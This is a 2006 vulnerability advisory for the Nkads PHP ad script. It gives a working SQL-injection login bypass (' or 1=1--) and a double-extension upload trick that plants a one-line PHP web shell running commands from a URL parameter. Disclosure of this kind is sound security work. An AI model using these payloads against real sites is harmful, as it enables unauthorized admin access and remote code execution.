===========================================================

============================================================
Title: Nkads Multiple Remote Vulnerabilities
Vulnerability discovery: SoulBlack - Security Research -
http://soulblack.com.ar
Date: 03/01/2006
Severity: High. Remote Users Can Execute Arbitrary Code.
Affected version: 1.0alfa3
vendor: http://nkads.nkstudios.net
============================================================

============================================================

* Summary *

Nkads is ads script written in PHP/SQL.

-------------------------------------------------------------

* Problem Description *

1- Admin Login injection sql:

Username:' or 1=1-- 
Passwd: ' or 1=1-- 

2- Upload filetype by pass:

Upload any file with ".jpg uploader"

Example: lol.jpg.php

<?
system($_GET[cmd]);
?>
-------------------------------------------------------------

* Fix *

Contact the vendor...

-------------------------------------------------------------

* References *

http://www.soulblack.com.ar/repo/papers/advisory/nkads_advisory.txt

-------------------------------------------------------------

* Credits *

Vulnerability reported by SoulBlack Security Research.

============================================================

--
SoulBlack - Security Research
http://www.soulblack.com.ar